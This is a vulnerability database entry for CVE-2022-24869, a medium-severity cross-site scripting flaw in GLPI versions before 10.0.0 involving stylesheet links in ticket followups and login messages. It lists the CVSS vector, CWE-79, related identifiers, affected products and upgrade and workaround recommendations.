CVE-2022-24869

CVSS v2.0

5.5

Medium

Vector

AV:N/AC:L/Au:S/C:P/I:P/A:N

Name of the Vulnerable Software and Affected Versions GLPI versions prior to 10.0.0

Description The issue is related to the use of ticket followups or setup login messages with a stylesheet link in GLPI, which may allow for a cross-site scripting attack vector. This is partially mitigated by the CORS security of browsers. Users are still advised to upgrade.

Recommendations For versions prior to 10.0.0, upgrade to version 10.0.0 or later to resolve the issue. As a temporary workaround, consider disabling the use of stylesheet links in ticket followups or setup login messages until a patch is available. Restrict access to the vulnerable features to minimize the risk of exploitation.

Exploit

Fix

XSS

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-79

Related Identifiers

ALT-PU-2016-1892

ALT-PU-2022-2177

ALT-PU-2022-2221

ALT-PU-2022-2614

ALT-PU-2022-2624

ALT-PU-2022-2665

ALT-PU-2023-7633

ALT-PU-2024-8030

ALT-PU-2024-8094

BDU:2024-05820

CVE-2022-24869

GHSA-P94C-8QP5-GFPX

Affected Products

Alt Linux

Glpi

Red Os

CVE-2022-24869

Weakness Enumeration

Related Identifiers

Affected Products

References · 20